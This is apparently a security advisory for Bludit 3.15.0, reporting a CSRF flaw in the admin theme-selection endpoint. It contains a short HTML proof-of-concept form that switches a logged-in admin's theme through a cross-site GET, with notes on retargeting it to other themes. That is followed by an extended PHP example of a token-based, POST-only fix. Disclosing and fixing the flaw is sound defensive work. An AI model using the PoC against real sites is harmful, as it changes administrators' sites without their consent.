A Cross-Site Request Forgery (CSRF) vulnerability has been identified within the admin theme selection functionality.
Steps to Reproduce:
Crafted a proof of concept (PoC) demonstrating a CSRF exploit that selects the alternative theme. Example:
```html
<html>
  <!-- Submitting this form sends a cross-site GET that carries the admin's session cookie -->
  <form enctype="text/plain" method="GET" action="https://localhost/bludit/admin/install-theme/alternative">
    <table>
      <tr>
        <td></td>
        <td><input type="text" value="Change Theme For PoC" name=""></td>
      </tr>
    </table>
    <input type="submit" value="https://localhost/bludit/admin/install-theme/alternative">
  </form>
</html>
```
Note: Replace `/alternative` with `/popeye` or `/blogx` to target different themes:

- `/alternative`
- `/popeye`
- `/blogx`
Impact: When a logged-in admin interacts with the crafted HTML page, the site's theme can be changed without their consent.
Recommendation: Implement CSRF protection mechanisms to mitigate unauthorized theme changes.
Bludit version: 3.15.0
PHP version: 8.2.12
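As an added illustration of the recommended fix (example code written for this page, not Bludit's own implementation), the following PHP contrasts the vulnerable shape of a theme-switch handler, which changes state on any request carrying the session cookie, with one guarded by a per-session synchronizer token and restricted to POST. The function names, the `tokenCSRF` field name, the session layout and the installed-theme list are assumptions for the example.

```php
<?php
// Added example, not Bludit's own code: a synchronizer-token CSRF guard for a
// state-changing admin action such as theme selection.
// Assumptions (hypothetical): the admin is already authenticated, the session
// is represented as an array, and the handler receives the theme slug as a parameter.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';

// Issue (or reuse) a per-session random token to embed in every admin form.
function csrfToken(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// Accept only a POST whose token matches the session token.
// hash_equals() compares in constant time so the check does not leak timing.
function csrfValid(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $provided = $post['tokenCSRF'] ?? ''; // assumed field name
    return $expected !== '' && is_string($provided) && hash_equals($expected, $provided);
}

// Vulnerable shape: any request that arrives with the admin's session cookie
// changes the theme, so a cross-origin <form method="GET"> or <img> is enough.
function installThemeVulnerable(string $slug, array &$site): void
{
    $site['theme'] = $slug;
}

// Hardened shape: refuse anything that is not a POST with a valid token, and
// only accept a slug that names an installed theme.
function installThemeHardened(
    string $slug, array &$site, array $session, string $method, array $post, array $installed
): bool {
    if (!csrfValid($session, $method, $post)) {
        return false;
    }
    if (!in_array($slug, $installed, true)) {
        return false;
    }
    $site['theme'] = $slug;
    return true;
}

// --- Constructed demonstration; no real server or browser is involved ---
$session   = [];
$site      = ['theme' => 'alternative'];
$installed = ['alternative', 'popeye', 'blogx']; // assumed theme list

// Forged cross-site request: a GET with no token. The vulnerable handler accepts it.
installThemeVulnerable('popeye', $site);
echo "vulnerable handler, forged GET: theme is now {$site['theme']}\n";

$site['theme'] = 'alternative';
// The same forged request against the hardened handler is refused.
$ok = installThemeHardened('popeye', $site, $session, 'GET', [], $installed);
echo 'hardened handler, forged GET: ' . ($ok ? 'changed' : 'refused') . ", theme is {$site['theme']}\n";

// Legitimate request: the admin's own form carries the session token in the POST body.
$token = csrfToken($session);
$ok = installThemeHardened('popeye', $site, $session, 'POST', ['tokenCSRF' => $token], $installed);
echo 'hardened handler, valid POST: ' . ($ok ? 'changed' : 'refused') . ", theme is {$site['theme']}\n";

// The form the admin page should render: POST, with the token as a hidden field.
echo '<form method="POST" action="/admin/install-theme/popeye">'
   . '<input type="hidden" name="tokenCSRF" value="' . htmlspecialchars($token, ENT_QUOTES) . '">'
   . '<button type="submit">Install theme</button></form>' . "\n";
```

Moving the action to POST matters as much as the token: a `SameSite=Lax` session cookie is still sent on top-level GET navigations, which is exactly what the PoC form above produces, so a GET endpoint stays exploitable under the common Lax default. The token check then closes the remaining cross-site POST vector regardless of cookie attributes.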